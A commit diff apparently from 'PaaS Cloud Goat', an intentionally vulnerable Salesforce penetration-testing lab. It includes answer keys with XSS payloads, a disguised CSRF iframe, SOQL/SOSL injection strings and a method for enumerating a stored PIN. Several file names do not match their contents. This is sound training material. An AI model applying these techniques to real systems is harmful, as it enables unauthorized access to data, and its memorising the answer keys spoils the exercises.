First revision publication

Author: rbeede

.forceignore

@@ -0,0 +1,17 @@
+# List files or directories below to ignore them when running force:source:push, force:source:pull, and force:source:status
+# More information: https://developer.salesforce.com/docs/atlas.en-us.sfdx_dev.meta/sfdx_dev/sfdx_dev_exclude_source.htm
+#
+
+# https://salesforce.stackexchange.com/questions/366564/deployment-error-the-appmenu-called-appswitcher-is-standard-and-cannot-be-de
+**/appMenus/**
+**/appSwitcher/**
+
+
+package.xml
+
+# LWC configuration files
+**/jsconfig.json
+**/.eslintrc.json
+
+# LWC Jest
+**/__tests__/**

.gitattributes

@@ -0,0 +1,50 @@
+# This file is used for Git repositories to specify intentionally untracked files that Git should ignore. 
+# If you are not using git, you can delete this file. For more information see: https://git-scm.com/docs/gitignore
+# For useful gitignore templates see: https://github.com/github/gitignore
+
+# Salesforce cache
+.sf/
+.sfdx/
+.localdevserver/
+deploy-options.json
+
+# LWC VSCode autocomplete
+**/lwc/jsconfig.json
+
+# LWC Jest coverage reports
+coverage/
+
+# Logs
+logs
+*.log
+npm-debug.log*
+yarn-debug.log*
+yarn-error.log*
+
+# Dependency directories
+node_modules/
+
+# Eslint cache
+.eslintcache
+
+# MacOS system files
+.DS_Store
+
+# Windows system files
+Thumbs.db
+ehthumbs.db
+[Dd]esktop.ini
+$RECYCLE.BIN/
+
+# Local environment variables
+.env
+
+# Python Salesforce Functions
+**/__pycache__/
+**/.venv/
+**/venv/
+
+
+# Local dev folders
+.vscode/
+.husky/

.gitignore

@@ -0,0 +1,11 @@
+# List files or directories below to ignore them when running prettier
+# More information: https://prettier.io/docs/en/ignore.html
+#
+
+**/staticresources/**
+.localdevserver
+.sfdx
+.sf
+.vscode
+
+coverage/

.prettierignore

@@ -0,0 +1,17 @@
+{
+  "trailingComma": "none",
+  "plugins": [
+    "prettier-plugin-apex",
+    "@prettier/plugin-xml"
+  ],
+  "overrides": [
+    {
+      "files": "**/lwc/**/*.html",
+      "options": { "parser": "lwc" }
+    },
+    {
+      "files": "*.{cmp,page,component}",
+      "options": { "parser": "html" }
+    }
+  ]
+}

.prettierrc

@@ -0,0 +1,3 @@
+Ignore the iframe just look at these cute cat pictures:
+
+<iframe src="https://rdbmlrodneybeedecom-dev-ed--c.develop.vf.force.com/apex/CSRF1?id=003ak000001ogzbAAA&isdtp=p1&newname=HackedViaCSRF" />

Documentation/Answer_Key/CSRF.html

@@ -0,0 +1,4 @@
+SELECT id,Name,PublicSize__c,SecretIngredient__c FROM SecretSauce__c 
+
+
+# Using SOQLInjection3 example

Documentation/Answer_Key/EncryptedField1.txt

@@ -0,0 +1,14 @@
+This page does not have a vulnerability as the user can only access things for which they already have permission.
+
+Select id,name from Contact
+
+Concept: Whether you use GUI pages or even have complete control over the query when leveraging the platform's security features data is secured.
+
+
+Do notice that you can guess and enumerate valid object field names (columns):
+
+SELECT name FROM Building__c
+
+versus the error from:
+
+SELECT address FROM Building__c

Documentation/Answer_Key/SOQL1.txt

@@ -0,0 +1,8 @@
+Select id,name from Contact
+
+Observe that the "PRIVATE" contact is still not listed due to the "with sharing" restriction.
+
+However, custom object like Building received the default configuration for sharing. The system mode made the difference.
+
+Notice also in code review the alternative ways to specify the authorization permission mode:
+    .isAccessible(), .isUpdateable(), .isCreateable(), .isDeletable()

Documentation/Answer_Key/SOQL3.txt

@@ -0,0 +1,20 @@
+Using Burp (or browser devtools):
+
+j_id0%3Ablock1%3Aj_id37%3Aj_id38%3Aj_id40%3Aeasymode=true
+
+
+j_id0%3Ablock1%3Aj_id37%3Aj_id38%3Aj_id40%3Aj_id41%3Aj_id47&column=dEsC+NULLS+LAST
+
+
+# observe this does not work due to ordering
+dEsC+NULLS+LAST+where+id+!%3d+NULL
+
+Example: Try this back on SOQL 3:
+
+# works without error
+
+SELECT id,Name,Title,Phone FROM Contact where Name LIKE '%' ORDER BY Name dEsC NULLS LAST
+
+# versus this which encounters an error
+
+SELECT id,Name,Title,Phone FROM Contact ORDER BY Name dEsC NULLS LAST where Name LIKE '%' 

Documentation/Answer_Key/SOQL4.txt

@@ -0,0 +1,14 @@
+HQ%
+
+    j_id0%3Ablock1%3Aj_id37%3Aj_id38%3Aj_id40%3Aj_id43=HQ%25
+
+# change table to
+Building__c
+
+    &j_id0%3Ablock1%3Aj_id37%3Aj_id38%3Aj_id40%3Aj_id44=Building__c
+
+easymode=true
+
+
+Note that there is no SOQL "comment" command so we cannot easily dispense with the WHERE Name LIKE ... part
+

Documentation/Answer_Key/SOQL5.txt

@@ -0,0 +1,12 @@
+Ja* or HQ or Bu*
+
+
+Code Review: You can actually escape out with something like:
+
+Ja*} IN Name Fields RETURNING Contact, 
+
+
+but you observe that crafting a request with the required closing ' to escape the extra text is complicated.
+
+
+The real vuln is the unpriv user was able to search and see Building__c objects that they do not have authorization to access.

Documentation/Answer_Key/SOSL1.txt

@@ -0,0 +1,51 @@
+HQ   (recommend setting a 6 digit PIN for demo)
+
+
+These FAIL due to quotes
+------------------------
+
+Name LIKE '%'
+
+Name LIKE \'%\'
+
+
+THIS one will work:
+-------------------
+
+EntryPIN__c > 0
+
+
+How to determine the PIN?
+
+Suppose we know it cannot start with 0. So possible values:
+1,000 to 99,999,999
+
+How many digits are in our pin?
+
+4, 5, 6, 7, 8  ???
+
+# somewhere 7 to 8 digits?
+EntryPIN__c > 999999
+
+# somewhere 4 to 5 digits?
+EntryPIN__c < 100000
+
+# else - must be 6 digits, can double check with
+EntryPIN__c >= 100000 AND EntryPIN__c <= 999999
+
+
+# get the first digit only
+#   Rule was PIN (stored in system at least) cannot start with 0
+#   1 to 9 with 6 digits
+
+EntryPIN__c >= 100000 AND EntryPIN__c <= 199999
+
+# Repeat with EntryPIN__c >= 200000 AND EntryPIN__c <= 299999
+# etc.  EntryPIN__c >= #00000 AND EntryPIN__c <= #99999
+
+# Get the second digit
+#   0 to 9 digits possible
+#   Provide the first digit as F
+EntryPIN__c >= F#0000 AND EntryPIN__c <= F#9999
+
+# an alternative would be to binay search the entire PIN all at once which is faster

Documentation/Answer_Key/SOSL2.txt

@@ -0,0 +1,13 @@
+# Two different examples, both log into the web browser dev console (F12)
+# Install these into a Contact's "Title"
+
+Observe that the Salesforce built-in table has anti-xss filtering built-in.
+Whether in the explicit form of:    <apex:outputText escape="true"
+or using {!variable} you get protection.
+
+However, escape="false" can turn-off this protection.
+
+
+<img onerror=console.log('xss') src=b/>
+
+"); console.log("level 2 XSS"); //comment-out_

Documentation/Answer_Key/XSS1 Persisent.txt

@@ -0,0 +1,13 @@
+Results will be in the web browser dev console (F12):
+
+
+https://rdbmlrodneybeedecom-dev-ed--c.develop.vf.force.com/apex/XSS2?#%22;%20console.log('xssdom');//
+
+
+# Breaking out of IE if comment
+https://rdbmlrodneybeedecom-dev-ed--c.develop.vf.force.com/apex/XSS2?userparam=testing%27;%3C/script%3E%3C![endif]--%3E%3Cscript%3Ealert(123)%3C/script%3E
+
+
+# variant 2
+
+https://rdbmlrodneybeedecom-dev-ed--c.develop.vf.force.com/apex/XSS2?debugmode=haha%22/%3E%3C![endif]--%3E%3Cscript%3Ealert(%27you%20got%20xss%20variant%27);%3C/script%3E

Documentation/Answer_Key/XSS2 Reflective and DOM.txt

@@ -0,0 +1,7 @@
+https://rdbmlrodneybeedecom-dev-ed--c.develop.vf.force.com/resource/1713821014000/logo_svg?bgc=alert(%22catz%22)
+
+
+# This is not vulnerable because text/css is sent to the browser
+https://rdbmlrodneybeedecom-dev-ed--c.develop.vf.force.com/resource/1713820342000/geocities_css#alert(%22catz%22)
+# same for this variant due to CSS not accessing hash context in newer browsers
+https://rdbmlrodneybeedecom-dev-ed--c.develop.vf.force.com/apex/XSS3#alert(123);

Documentation/Answer_Key/XSS3 via static resource.txt

@@ -0,0 +1,2 @@
+[InternetShortcut]
+URL=https://www.youtube.com/watch?v=L_KIEW0ahNs

Documentation/Deploying Paas Cloud Goat - version_2024-05.pptx

@@ -0,0 +1,6 @@
+XXE example
+    Finish example
+
+Java deserialization example
+
+Lightning vs VF vs Apex

Documentation/How to Download All Metadata From Salesforce Using VS Code and SFDX- - @SalesforceHunt - #sfdx - YouTube.url

@@ -0,0 +1,14 @@
+https://www.rodneybeede.com
+
+Rodney Beede © 2024
+
+----
+
+PaaS Cloud Goat is a simulated vulnerable Salesforce application providing hands-on experience with penetration testing of custom Salesforce applications.
+
+The tool is similar to other test tools like CloudGoat, CloudFoxable, AzureGoat, GCPGoat, and Pen-Testing Cloud REST APIs in OpenStack. It is not, however, a tool for attacking Salesforce.com itself.
+
+It is novel because it focuses on custom applications deployed using the Salesforce platform and is the first tool to provide lab exercises with a collection of security tests. The main takeaways:
+1. Hands-on learning opportunity of security tests for a custom Salesforce application
+2. Detailed training documentation material about the underlying flaws to look for
+3. Single consolidated list of common Salesforce application vulnerabilities

Documentation/OWASP San Antonio - July 2024 - Rodney Beede.pptx

@@ -0,0 +1,5 @@
+"Id","OwnerId","IsDeleted","Name","CreatedDate","CreatedById","LastModifiedDate","LastModifiedById","SystemModstamp","EntryPIN__c"
+"a01ak00000CceokAAB","005ak0000033pdlAAA","0","Vault","2024-04-10 20:01:18","005ak0000033pdlAAA","2024-04-10 20:01:18","005ak0000033pdlAAA","2024-04-10 20:01:18","42"
+"a01ak00000CcetaAAB","005ak0000033pdlAAA","0","Satellite","2024-04-10 19:51:30","005ak0000033pdlAAA","2024-04-10 19:51:30","005ak0000033pdlAAA","2024-04-10 19:51:30","71478"
+"a01ak00000CckJ3AAJ","005ak0000033pdlAAA","0","HQ","2024-04-10 19:50:53","005ak0000033pdlAAA","2024-04-26 21:30:19","005ak0000033pdlAAA","2024-04-26 21:30:19","123123"
+"a01ak00000CcuS5AAJ","005ak0000033pdlAAA","0","Bunker","2024-04-10 19:59:02","005ak0000033pdlAAA","2024-04-10 19:59:02","005ak0000033pdlAAA","2024-04-10 19:59:02","71927"

Documentation/Salesforce Pen Testing Tips & Tricks.pptx

@@ -0,0 +1,67 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<Package xmlns="http://soap.sforce.com/2006/04/metadata">
+    <types>
+        <members>SOQLInjection1</members>
+        <name>ApexClass</name>
+    </types>
+    <types>
+        <members>SOQLInjection1</members>
+        <name>ApexPage</name>
+    </types>
+    <types>
+        <members>A_hacker_goat_in_the_cloud_Copilot</members>
+        <name>ContentAsset</name>
+    </types>
+    <types>
+        <members>PaaS_Cloud_Goat</members>
+        <name>CustomApplication</name>
+    </types>
+    <types>
+        <members>Building__c.EntryPIN__c</members>
+        <name>CustomField</name>
+    </types>
+    <types>
+        <members>CustomLabels</members>
+        <name>CustomLabels</name>
+    </types>
+    <types>
+        <members>Building__c</members>
+        <name>CustomObject</name>
+    </types>
+    <types>
+        <members>Building__c-en_US</members>
+        <name>CustomObjectTranslation</name>
+    </types>
+    <types>
+        <members>Building__c</members>
+        <members>SOQL_Query_Language_Example</members>
+        <members>WelcomeLab</members>
+        <name>CustomTab</name>
+    </types>
+    <types>
+        <members>BuildingsPage</members>
+        <members>PaaS_Cloud_Goat_UtilityBar</members>
+        <name>FlexiPage</name>
+    </types>
+    <types>
+        <members>Building__c-Building Layout</members>
+        <name>Layout</name>
+    </types>
+    <types>
+        <members>Building__c.All</members>
+        <name>ListView</name>
+    </types>
+    <types>
+        <members>Building__c</members>
+        <name>SharingRules</name>
+    </types>
+    <types>
+        <members>Building__c</members>
+        <name>TopicsForObjects</name>
+    </types>
+    <types>
+        <members>BuildingsPage</members>
+        <name>UiViewDefinition</name>
+    </types>
+    <version>59.0</version>
+</Package>

Documentation/TODO.txt

@@ -0,0 +1,13 @@
+{
+  "orgName": "Demo company",
+  "edition": "Developer",
+  "features": ["EnableSetPasswordInApi"],
+  "settings": {
+    "lightningExperienceSettings": {
+      "enableS1DesktopEnabled": true
+    },
+    "mobileSettings": {
+      "enableS1EncryptedStoragePref2": false
+    }
+  }
+}